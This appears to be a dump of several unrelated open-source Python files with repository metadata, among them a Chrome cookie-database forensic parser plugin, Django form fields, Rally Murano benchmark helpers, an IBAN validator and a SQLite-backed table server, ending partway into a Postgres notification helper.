(('SELECT creation_utc, host_key, name, value, path, expires_utc, '
'secure, httponly, last_access_utc, has_expires, persistent '
'FROM cookies'), 'ParseCookieRow')]
SCHEMAS = [{
'cookies': (
'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY '
'KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT '
'NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure '
'INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc '
'INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent '
'INTEGER DEFAULT 1)'),
'meta': (
'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, '
'value LONGVARCHAR)')}]
class Chrome66CookiePlugin(BaseChromeCookiePlugin):
"""SQLite parser plugin for Google Chrome 66+ cookies database files."""
NAME = 'chrome_66_cookies'
DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file'
REQUIRED_STRUCTURE = {
'cookies': frozenset([
'creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc',
'is_secure', 'is_httponly', 'last_access_utc', 'has_expires',
'is_persistent']),
'meta': frozenset([])}
QUERIES = [
(('SELECT creation_utc, host_key, name, value, path, expires_utc, '
'is_secure AS secure, is_httponly AS httponly, last_access_utc, '
'has_expires, is_persistent AS persistent '
'FROM cookies'), 'ParseCookieRow')]
SCHEMAS = [{
'cookies': (
'CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT '
'NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT '
'NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, '
'is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, '
'has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT '
'NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, '
'encrypted_value BLOB DEFAULT \'\', firstpartyonly INTEGER NOT NULL '
'DEFAULT 0, UNIQUE (host_key, name, path))'),
'meta': (
'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, '
'value LONGVARCHAR)')}]
sqlite.SQLiteParser.RegisterPlugins([
Chrome17CookiePlugin, Chrome66CookiePlugin])
| apache-2.0 | -3,767,058,547,770,239,000 | 36.872642 | 79 | 0.668078 | false |
jonatascastro12/django-dashboard_view | django_select2_extension/fields.py | 1 | 3839 | from django.db.models.query_utils import Q
from django.forms.models import ModelChoiceIterator
from django_select2.fields import ChoiceMixin, AutoModelSelect2MultipleField, AutoModelSelect2Field
from django_select2_extension.widgets import AutoPhotoHeavySelect2MultipleWidget, AutoPhotoHeavySelect2Widget
class FilterableAdvancedModelChoiceIterator(ModelChoiceIterator):
"""
Extends ModelChoiceIterator to add the capability to apply additional
filter on the passed queryset and also return the obj instance.
"""
def choice(self, obj):
return (self.field.prepare_value(obj), self.field.label_from_instance(obj), obj)
def set_extra_filter(self, **filter_map):
"""
Applies additional filter on the queryset. This can be called multiple times.
:param filter_map: The ``**kwargs`` to pass to :py:meth:`django.db.models.query.QuerySet.filter`.
        If this is not set then any additional filter applied before is removed.
"""
if not hasattr(self, '_original_queryset'):
import copy
self._original_queryset = copy.deepcopy(self.queryset)
if filter_map:
self.queryset = self._original_queryset.filter(**filter_map)
else:
self.queryset = self._original_queryset
class QuerysetAdvancedChoiceMixin(ChoiceMixin):
"""
Overrides ``choices``' getter to return instance of :py:class:`.FilterableAdvancedModelChoiceIterator`
instead.
"""
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh ModelChoiceIterator that has not been
# consumed. Note that we're instantiating a new ModelChoiceIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return FilterableAdvancedModelChoiceIterator(self)
choices = property(_get_choices, ChoiceMixin._set_choices)
def __deepcopy__(self, memo):
result = super(QuerysetAdvancedChoiceMixin, self).__deepcopy__(memo)
# Need to force a new ModelChoiceIterator to be created, bug #11183
result.queryset = result.queryset
return result
def prepare_qs_params(self, request, search_term, search_fields):
q = None
for field in search_fields:
kwargs = {}
search_term = search_term.strip()
if " " in search_term:
splitted_terms = search_term.split(" ")
for term in splitted_terms:
kwargs[field] = term
if q is None:
q = Q(**kwargs)
else:
q = q | Q(**kwargs)
else:
kwargs[field] = search_term
if q is None:
q = Q(**kwargs)
else:
q = q | Q(**kwargs)
return {'or': [q], 'and': {}}
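    # Illustrative example (hypothetical field names, not part of this module):
    # searching "john doe" over search_fields ['first_name__icontains',
    # 'last_name__icontains'] returns
    #   {'or': [Q(first_name__icontains='john') | Q(first_name__icontains='doe')
    #           | Q(last_name__icontains='john') | Q(last_name__icontains='doe')],
    #    'and': {}}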
class AutoPhotoModelSelect2Field(QuerysetAdvancedChoiceMixin, AutoModelSelect2Field):
widget = AutoPhotoHeavySelect2Widget
def extra_data_from_instance(self, obj):
return {'photo': obj.get_small_thumbnail()}
class AutoPhotoModelSelect2MultipleField(QuerysetAdvancedChoiceMixin, AutoModelSelect2MultipleField):
widget = AutoPhotoHeavySelect2MultipleWidget
def extra_data_from_instance(self, obj):
return {'photo': obj.get_small_thumbnail()} | gpl-2.0 | -1,333,794,018,231,232,500 | 41.197802 | 109 | 0.648085 | false |
rh-lab-q/conflab | wsgi/openshift/confla/utils.py | 1 | 1275 | import os
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext as _
from django.utils.deconstruct import deconstructible
@deconstructible
class ConfRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.url_id, ext)
return os.path.join(self.path, filename)
@deconstructible
class UserRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.username, ext)
return os.path.join(self.path, filename)
@deconstructible
class PaperRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.user.username, ext)
        return os.path.join(self.path, filename)
splash_rename_and_return_path = ConfRenamePath('splash/')
icon_rename_and_return_path = ConfRenamePath('icon/')
user_rename_and_return_path = UserRenamePath('avatars/')
paper_rename_and_return_path = PaperRenamePath('papers/')
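# Minimal usage sketch (hypothetical model, for illustration only): these callables
# are intended to be passed as ``upload_to`` on file fields, e.g.
#
#   class Conference(models.Model):
#       icon = models.ImageField(upload_to=icon_rename_and_return_path)
#
# so an uploaded file is renamed to "<url_id>.<ext>" inside the 'icon/' directory.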
| gpl-3.0 | -7,650,763,214,364,231,000 | 28.651163 | 62 | 0.661176 | false |
group-policy/rally | rally/plugins/openstack/scenarios/murano/utils.py | 1 | 9884 | # Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import uuid
import zipfile
from oslo_config import cfg
import yaml
from rally.common import fileutils
from rally.common import utils as common_utils
from rally.plugins.openstack import scenario
from rally.task import atomic
from rally.task import utils
CONF = cfg.CONF
MURANO_BENCHMARK_OPTS = [
cfg.IntOpt("murano_deploy_environment_timeout", default=1200,
deprecated_name="deploy_environment_timeout",
help="A timeout in seconds for an environment deploy"),
cfg.IntOpt("murano_deploy_environment_check_interval", default=5,
deprecated_name="deploy_environment_check_interval",
help="Deploy environment check interval in seconds"),
]
benchmark_group = cfg.OptGroup(name="benchmark", title="benchmark options")
CONF.register_opts(MURANO_BENCHMARK_OPTS, group=benchmark_group)
class MuranoScenario(scenario.OpenStackScenario):
"""Base class for Murano scenarios with basic atomic actions."""
@atomic.action_timer("murano.list_environments")
def _list_environments(self):
"""Return environments list."""
return self.clients("murano").environments.list()
@atomic.action_timer("murano.create_environment")
def _create_environment(self):
"""Create environment.
:param env_name: String used to name environment
:returns: Environment instance
"""
env_name = self.generate_random_name()
return self.clients("murano").environments.create({"name": env_name})
@atomic.action_timer("murano.delete_environment")
def _delete_environment(self, environment):
"""Delete given environment.
Return when the environment is actually deleted.
:param environment: Environment instance
"""
self.clients("murano").environments.delete(environment.id)
@atomic.action_timer("murano.create_session")
def _create_session(self, environment_id):
"""Create session for environment with specific id
:param environment_id: Environment id
:returns: Session instance
"""
return self.clients("murano").sessions.configure(environment_id)
@atomic.optional_action_timer("murano.create_service")
def _create_service(self, environment, session, full_package_name,
image_name=None, flavor_name=None):
"""Create Murano service.
:param environment: Environment instance
:param session: Session instance
:param full_package_name: full name of the Murano package
:param image_name: Image name
:param flavor_name: Flavor name
:param atomic_action: True if this is atomic action. added and
handled by the optional_action_timer()
decorator
:returns: Service instance
"""
app_id = str(uuid.uuid4())
data = {"?": {"id": app_id,
"type": full_package_name},
"name": self.generate_random_name()}
return self.clients("murano").services.post(
environment_id=environment.id, path="/", data=data,
session_id=session.id)
@atomic.action_timer("murano.deploy_environment")
def _deploy_environment(self, environment, session):
"""Deploy environment.
:param environment: Environment instance
:param session: Session instance
"""
self.clients("murano").sessions.deploy(environment.id,
session.id)
config = CONF.benchmark
utils.wait_for(
environment, is_ready=utils.resource_is("READY"),
update_resource=utils.get_from_manager(["DEPLOY FAILURE"]),
timeout=config.murano_deploy_environment_timeout,
check_interval=config.murano_deploy_environment_check_interval
)
@atomic.action_timer("murano.list_packages")
def _list_packages(self, include_disabled=False):
"""Returns packages list.
:param include_disabled: if "True" then disabled packages will be
included in a the result.
Default value is False.
:returns: list of imported packages
"""
return self.clients("murano").packages.list(
include_disabled=include_disabled)
@atomic.action_timer("murano.import_package")
def _import_package(self, package):
"""Import package to the Murano.
:param package: path to zip archive with Murano application
:returns: imported package
"""
package = self.clients("murano").packages.create(
{}, {"file": open(package)}
)
return package
@atomic.action_timer("murano.delete_package")
def _delete_package(self, package):
"""Delete specified package.
:param package: package that will be deleted
"""
self.clients("murano").packages.delete(package.id)
@atomic.action_timer("murano.update_package")
def _update_package(self, package, body, operation="replace"):
"""Update specified package.
:param package: package that will be updated
:param body: dict object that defines what package property will be
updated, e.g {"tags": ["tag"]} or {"enabled": "true"}
:param operation: string object that defines the way of how package
property will be updated, allowed operations are
"add", "replace" or "delete".
Default value is "replace".
:returns: updated package
"""
return self.clients("murano").packages.update(
package.id, body, operation)
@atomic.action_timer("murano.filter_applications")
def _filter_applications(self, filter_query):
"""Filter list of uploaded application by specified criteria.
:param filter_query: dict that contains filter criteria, it
will be passed as **kwargs to filter method
e.g. {"category": "Web"}
:returns: filtered list of packages
"""
return self.clients("murano").packages.filter(**filter_query)
def _zip_package(self, package_path):
"""Call _prepare_package method that returns path to zip archive."""
return MuranoPackageManager(self.task)._prepare_package(package_path)
class MuranoPackageManager(common_utils.RandomNameGeneratorMixin):
RESOURCE_NAME_FORMAT = "app.rally_XXXXXXXX_XXXXXXXX"
def __init__(self, task):
self.task = task
@staticmethod
def _read_from_file(filename):
with open(filename, "r") as f:
read_data = f.read()
return yaml.safe_load(read_data)
@staticmethod
def _write_to_file(data, filename):
with open(filename, "w") as f:
yaml.safe_dump(data, f)
def _change_app_fullname(self, app_dir):
"""Change application full name.
        To avoid name conflicts during package import (when a user tries to
        import several packages into the same tenant) the application name
        needs to be changed. To do this, the following parts of manifest.yaml
        are replaced:
from
...
FullName: app.name
...
Classes:
app.name: app_class.yaml
to:
...
FullName: <new_name>
...
Classes:
<new_name>: app_class.yaml
:param app_dir: path to directory with Murano application context
"""
new_fullname = self.generate_random_name()
manifest_file = os.path.join(app_dir, "manifest.yaml")
manifest = self._read_from_file(manifest_file)
class_file_name = manifest["Classes"][manifest["FullName"]]
# update manifest.yaml file
del manifest["Classes"][manifest["FullName"]]
manifest["FullName"] = new_fullname
manifest["Classes"][new_fullname] = class_file_name
self._write_to_file(manifest, manifest_file)
def _prepare_package(self, package_path):
"""Check whether the package path is path to zip archive or not.
        If package_path is not a path to a zip archive but a path to a Murano
        application folder, then the method prepares a zip archive with the
        Murano application. It copies the directory with Murano app files to a temporary
folder, changes manifest.yaml and class file (to avoid '409 Conflict'
errors in Murano) and prepares zip package.
:param package_path: path to zip archive or directory with package
components
:returns: path to zip archive with Murano application
"""
if not zipfile.is_zipfile(package_path):
tmp_dir = tempfile.mkdtemp()
pkg_dir = os.path.join(tmp_dir, "package/")
try:
shutil.copytree(package_path, pkg_dir)
self._change_app_fullname(pkg_dir)
package_path = fileutils.pack_dir(pkg_dir)
finally:
shutil.rmtree(tmp_dir)
return package_path
| apache-2.0 | -1,880,708,867,045,607,000 | 35.072993 | 79 | 0.625152 | false |
cgstudiomap/cgstudiomap | main/eggs/python_stdnum-1.2-py2.7.egg/stdnum/iban.py | 1 | 3897 | # iban.py - functions for handling International Bank Account Numbers (IBANs)
#
# Copyright (C) 2011, 2012, 2013 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IBAN (International Bank Account Number).
The IBAN is used to identify bank accounts across national borders. The
first two letters are a country code. The next two digits are check digits
for the ISO 7064 Mod 97, 10 checksum. Each country uses its own format
for the remainder of the number.
Some countries may also use checksum algorithms within their number but
this is currently not checked by this module.
>>> validate('GR16 0110 1050 0000 1054 7023 795')
'GR1601101050000010547023795'
>>> validate('BE31435411161155')
'BE31435411161155'
>>> compact('GR16 0110 1050 0000 1054 7023 795')
'GR1601101050000010547023795'
>>> format('GR1601101050000010547023795')
'GR16 0110 1050 0000 1054 7023 795'
"""
import re
from stdnum import numdb
from stdnum.exceptions import *
from stdnum.iso7064 import mod_97_10
from stdnum.util import clean
# our open copy of the IBAN database
_ibandb = numdb.get('iban')
# the valid characters we have
_alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# regular expression to check IBAN structure
_struct_re = re.compile(r'([1-9][0-9]*)!([nac])')
def compact(number):
"""Convert the iban number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def _to_base10(number):
"""Prepare the number to its base10 representation (also moving the
check digits to the end) so it can be checked with the ISO 7064
Mod 97, 10 algorithm."""
# TODO: find out whether this should be in the mod_97_10 module
return ''.join(str(_alphabet.index(x)) for x in number[4:] + number[:4])
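    # e.g. (illustrative): _to_base10('BE31435411161155') == '435411161155111431'
    # (the first four characters move to the end and letters map to A=10 ... Z=35)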
def _struct_to_re(structure):
"""Convert an IBAN structure to a refular expression that can be used
to validate the number."""
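    # For example (illustrative): the structure '2!a2!n16!c' yields a pattern
    # equivalent to '^[A-Z]{2}[0-9]{2}[A-Za-z0-9]{16}$'.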
def conv(match):
chars = {
'n': '[0-9]',
'a': '[A-Z]',
'c': '[A-Za-z0-9]',
}[match.group(2)]
return '%s{%s}' % (chars, match.group(1))
return re.compile('^%s$' % _struct_re.sub(conv, structure))
def validate(number):
"""Checks to see if the number provided is a valid IBAN."""
number = compact(number)
try:
test_number = _to_base10(number)
except Exception:
raise InvalidFormat()
# ensure that checksum is valid
mod_97_10.validate(test_number)
# look up the number
info = _ibandb.info(number)
# check if the bban part of number has the correct structure
bban = number[4:]
if not _struct_to_re(info[0][1].get('bban', '')).match(bban):
raise InvalidFormat()
# return the compact representation
return number
def is_valid(number):
"""Checks to see if the number provided is a valid IBAN."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number, separator=' '):
"""Reformat the passed number to the space-separated format."""
number = compact(number)
return separator.join(number[i:i + 4] for i in range(0, len(number), 4))
| agpl-3.0 | -2,954,733,184,539,268,600 | 32.886957 | 77 | 0.699769 | false |
mysociety/manchester-survey | survey/migrations/0003_auto__chg_field_user_email.py | 1 | 1991 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'User.email'
db.alter_column(u'survey_user', 'email', self.gf('django.db.models.fields.TextField')(unique=True, null=True))
def backwards(self, orm):
# Changing field 'User.email'
db.alter_column(u'survey_user', 'email', self.gf('django.db.models.fields.TextField')(default='', unique=True))
models = {
u'survey.item': {
'Meta': {'object_name': 'Item'},
'batch': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['survey.User']"}),
'value': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'whenstored': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'survey.secret': {
'Meta': {'object_name': 'Secret'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'secret': ('django.db.models.fields.TextField', [], {})
},
u'survey.user': {
'Meta': {'object_name': 'User'},
'code': ('django.db.models.fields.TextField', [], {'unique': 'True', 'db_index': 'True'}),
'email': ('django.db.models.fields.TextField', [], {'unique': 'True', 'null': 'True', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['survey'] | agpl-3.0 | -6,821,724,920,916,634,000 | 44.272727 | 119 | 0.5555 | false |
MediaMath/qasino | lib/data_manager.py | 1 | 15026 | # Copyright (C) 2014 MediaMath, Inc. <http://www.mediamath.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sqlite_backend as sql_backend
import table_merger
import util
import qasino_table
import logging
import time
import re
import yaml
import sys
import thread
from twisted.internet import threads
from twisted.internet import task
from twisted.internet import reactor
class DataManager(object):
def __init__(self, use_dbfile, db_dir=None, signal_channel=None, archive_db_dir=None,
generation_duration_s=30):
self.saved_tables = {}
self.query_id = 0
self.views = {}
self.thread_id = thread.get_ident()
self.stats = {}
self.generation_duration_s = generation_duration_s
self.signal_channel = signal_channel
self.archive_db_dir = archive_db_dir
self.static_db_filepath = db_dir + '/qasino_table_store_static.db'
# Start with zero because we'll call rotate_dbs instantly below.
self.db_generation_number = 0
        # use_dbfile can be:
        #   'memory'              -> use an in-memory db
        #   a name containing %d  -> template filename; a new db file per generation
        #   a name without %d     -> a single db file reused every generation
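        # For example (illustrative values): use_dbfile='qasino_table_store_%d.db'
        # opens a fresh file every generation, while use_dbfile='qasino.db'
        # reuses one file (one_db is set below).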
self.one_db = False
self.db_name = use_dbfile
if use_dbfile == None:
self.db_name = "qasino_table_store_%d.db"
elif use_dbfile == "memory":
self.db_name = ":memory:"
self.one_db = True
elif use_dbfile.find('%d') == -1:
self.one_db = True
# Initialize some things
self.table_merger = table_merger.TableMerger(self)
# Add db_dir path
if db_dir != None and self.db_name != ":memory:":
self.db_name = db_dir + '/' + self.db_name
# Open the writer backend db.
db_file_name = self.db_name
if not self.one_db:
db_file_name = self.db_name % self.db_generation_number
self.sql_backend_reader = None
self.sql_backend_writer = sql_backend.SqlConnections(db_file_name,
self,
self.archive_db_dir,
self.thread_id,
self.static_db_filepath)
self.sql_backend_writer_static = sql_backend.SqlConnections(self.static_db_filepath,
self,
self.archive_db_dir,
self.thread_id,
None)
# Make the data manager db rotation run at fixed intervals.
        # The looping call also fires immediately, which makes the writer we
        # just opened the reader and opens a new writer.
self.rotate_task = task.LoopingCall(self.async_rotate_dbs)
self.rotate_task.start(self.generation_duration_s)
def read_views(self, filename):
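        # Expected layout of the views YAML file (illustrative sketch):
        #   - viewname: my_view
        #     view: "SELECT ... FROM some_table ..."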
# Reset views
self.views = {}
try:
fh = open(filename, "r")
except Exception as e:
logging.info("Failed to open views file '%s': %s", filename, e)
return
try:
view_conf_obj = yaml.load(fh)
except Exception as e:
logging.info("Failed to parse view conf yaml file '%s': %s", filename, e)
return
for view in view_conf_obj:
try:
viewname = view["viewname"]
view = view["view"]
self.views[viewname] = { 'view' : view, 'loaded' : False, 'error' : '' }
except Exception as e:
logging.info("Failure getting view '%s': %s", view["viewname"] if "viewname" in view else 'unknown', e)
def get_query_id(self):
self.query_id += 1
return self.query_id
def shutdown(self):
self.rotate_task = None
self.sql_backend_reader = None
self.sql_backend_writer = None
def async_validate_and_route_query(self, sql, query_id, use_write_db=False):
if use_write_db:
return self.sql_backend_writer.run_interaction(sql_backend.SqlConnections.WRITER_INTERACTION,
self.validate_and_route_query, sql, query_id, self.sql_backend_writer)
else:
return self.sql_backend_reader.run_interaction(sql_backend.SqlConnections.READER_INTERACTION,
self.validate_and_route_query, sql, query_id, self.sql_backend_reader)
def validate_and_route_query(self, txn, sql, query_id, sql_backend):
# So when dbs rotate we'll force a shutdown of the backend
# after a certain amount of time to avoid hung or long running
# things in this code path from holding dbs open. This
# may/will invalidate references we might have in here so wrap
# it all in a try catch...
try:
m = re.search(r"^\s*select\s+", sql, flags=re.IGNORECASE)
if m == None:
# Process a non-select statement.
return self.process_non_select(txn, sql, query_id, sql_backend)
# Process a select statement.
return sql_backend.do_select(txn, sql)
except Exception as e:
msg = "Exception in validate_and_route_query: {}".format(str(e))
logging.info(msg)
return { "retval" : 0, "error_message" : msg }
def process_non_select(self, txn, sql, query_id, sql_backend):
"""
Called for non-select statements like show tables and desc.
"""
# DESC?
m = re.search(r"^\s*desc\s+(\S+)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
(retval, error_message, table) = sql_backend.do_desc(txn, m.group(1))
result = { "retval" : retval }
if error_message:
result["error_message"] = error_message
if table:
result["data"] = table
return result
# DESC VIEW?
m = re.search(r"^\s*desc\s+view\s+(\S+)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT view FROM qasino_server_views WHERE viewname = '%s';" % m.group(1))
# SHOW tables?
m = re.search(r"^\s*show\s+tables\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_tables ORDER BY tablename;")
# SHOW tables with LIKE?
m = re.search(r"^\s*show\s+tables\s+like\s+('\S+')\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_tables WHERE tablename LIKE {} ORDER BY tablename;".format(m.group(1)) )
# SHOW connections?
m = re.search(r"^\s*show\s+connections\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', last_update_epoch, 'unixepoch') last_update_datetime FROM qasino_server_connections ORDER BY identity;")
# SHOW info?
m = re.search(r"^\s*show\s+info\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT *, strftime('%Y-%m-%d %H:%M:%f UTC', generation_start_epoch, 'unixepoch') generation_start_datetime FROM qasino_server_info;")
# SHOW views?
m = re.search(r"^\s*show\s+views\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return sql_backend.do_select(txn, "SELECT viewname, loaded, errormsg FROM qasino_server_views ORDER BY viewname;")
# Exit?
m = re.search(r"^\s*(quit|logout|exit)\s*;$", sql, flags=re.IGNORECASE)
if m != None:
return { "retval" : 0, "error_message" : "Bye!" }
return { "retval" : 1, "error_message" : "ERROR: Unrecognized statement: %s" % sql }
def get_table_list(self):
return self.sql_backend_reader.tables
def insert_tables_table(self, txn, sql_backend_writer, sql_backend_writer_static):
table = qasino_table.QasinoTable("qasino_server_tables")
table.add_column("tablename", "varchar")
table.add_column("nr_rows", "int")
table.add_column("nr_updates", "int")
table.add_column("last_update_epoch", "int")
table.add_column("static", "int")
sql_backend_writer.add_tables_table_rows(table)
sql_backend_writer_static.add_tables_table_rows(table)
# the chicken or the egg - how do we add ourselves?
table.add_row( [ "qasino_server_tables",
table.get_nr_rows() + 1,
1,
time.time(),
0 ] )
return sql_backend_writer.add_table_data(txn, table, util.Identity.get_identity())
    # This hack ensures all the internal tables are inserted
# using the same sql_backend_writer and makes sure that the
# "tables" table is called last (after all the other internal
# tables are added).
def insert_internal_tables(self, txn, sql_backend_writer, sql_backend_reader, db_generation_number, time, generation_duration_s, views):
sql_backend_writer.insert_info_table(txn, db_generation_number, time, generation_duration_s)
sql_backend_writer.insert_connections_table(txn)
if sql_backend_reader != None:
sql_backend_writer.insert_sql_stats_table(txn, sql_backend_reader)
sql_backend_writer.insert_update_stats_table(txn)
# this should be second last so views can be created of any tables above.
# this means though that you can not create views of any tables below.
sql_backend_writer.add_views(txn, views)
sql_backend_writer.insert_views_table(txn, views)
# this should be last to include all the above tables
self.insert_tables_table(txn, sql_backend_writer, self.sql_backend_writer_static)
def async_rotate_dbs(self):
"""
Kick off the rotate in a sqlconnection context because we have
some internal tables and views to add before we rotate dbs.
"""
self.sql_backend_writer.run_interaction(sql_backend.SqlConnections.WRITER_INTERACTION, self.rotate_dbs)
def rotate_dbs(self, txn):
"""
Make the db being written to be the reader db.
Open a new writer db for all new updates.
"""
logging.info("**** DataManager: Starting generation %d", self.db_generation_number)
# Before making the write db the read db,
# add various internal info tables and views.
self.insert_internal_tables(txn,
self.sql_backend_writer,
self.sql_backend_reader,
self.db_generation_number,
time.time(),
self.generation_duration_s,
self.views)
# Increment the generation number.
self.db_generation_number = int(time.time())
# Set the writer to a new db
save_sql_backend_writer = self.sql_backend_writer
# If specified put the generation number in the db name.
db_file_name = self.db_name
if not self.one_db:
db_file_name = self.db_name % self.db_generation_number
self.sql_backend_writer = sql_backend.SqlConnections(db_file_name,
self,
self.archive_db_dir,
self.thread_id,
self.static_db_filepath)
# Set the reader to what was the writer
# Note the reader will (should) be deconstructed here.
# Just in case something else is holding a ref to the reader
# (indefinitely!?) force a shutdown of this backend after a
# certain amount of time though.
if self.sql_backend_reader:
reactor.callLater(self.generation_duration_s * 3,
sql_backend.SqlConnections.shutdown,
self.sql_backend_reader.writer_dbpool,
self.sql_backend_reader.filename,
None)
reactor.callLater(self.generation_duration_s * 3,
sql_backend.SqlConnections.shutdown,
self.sql_backend_reader.reader_dbpool,
self.sql_backend_reader.filename,
self.sql_backend_reader.archive_db_dir)
self.sql_backend_reader = save_sql_backend_writer
# Load saved tables.
self.async_add_saved_tables()
# Lastly blast out the generation number.
if self.signal_channel != None:
self.signal_channel.send_generation_signal(self.db_generation_number, self.generation_duration_s)
def check_save_table(self, table, identity):
tablename = table.get_tablename()
key = tablename + identity
if table.get_property('persist'):
self.saved_tables[key] = { "table" : table, "tablename" : tablename, "identity" : identity }
else:
# Be sure to remove a table that is no longer persisting.
if key in self.saved_tables:
del self.saved_tables[key]
def async_add_saved_tables(self):
for key, table_data in self.saved_tables.iteritems():
logging.info("DataManager: Adding saved table '%s' from '%s'", table_data["tablename"], table_data["identity"])
self.sql_backend_writer.async_add_table_data(table_data["table"], table_data["identity"])
| apache-2.0 | 5,960,669,923,601,375,000 | 36.753769 | 235 | 0.55943 | false |
jjdmol/LOFAR | LCS/PyCommon/postgres.py | 1 | 11659 | #!/usr/bin/python
# Copyright (C) 2012-2015 ASTRON (Netherlands Institute for Radio Astronomy)
# P.O. Box 2, 7990 AA Dwingeloo, The Netherlands
#
# This file is part of the LOFAR software suite.
# The LOFAR software suite is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The LOFAR software suite is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with the LOFAR software suite. If not, see <http://www.gnu.org/licenses/>.
# $Id$
'''
Module with nice postgres helper methods and classes.
'''
import logging
from threading import Thread, Lock
from Queue import Queue, Empty
import select
import psycopg2
import psycopg2.extras
import psycopg2.extensions
logger = logging.getLogger(__name__)
def makePostgresNotificationQueries(schema, table, action, view_for_row=None, view_selection_id=None):
action = action.upper()
if action not in ('INSERT', 'UPDATE', 'DELETE'):
        raise ValueError('''action '%s' not in ('INSERT', 'UPDATE', 'DELETE')''' % action)
if view_for_row and action == 'DELETE':
raise ValueError('You cannot use a view for results on action DELETE')
if view_for_row:
change_name = '''{table}_{action}_with_{view_for_row}'''.format(schema=schema,
table=table,
action=action,
view_for_row=view_for_row)
function_name = '''NOTIFY_{change_name}'''.format(change_name=change_name)
function_sql = '''
CREATE OR REPLACE FUNCTION {schema}.{function_name}()
RETURNS TRIGGER AS $$
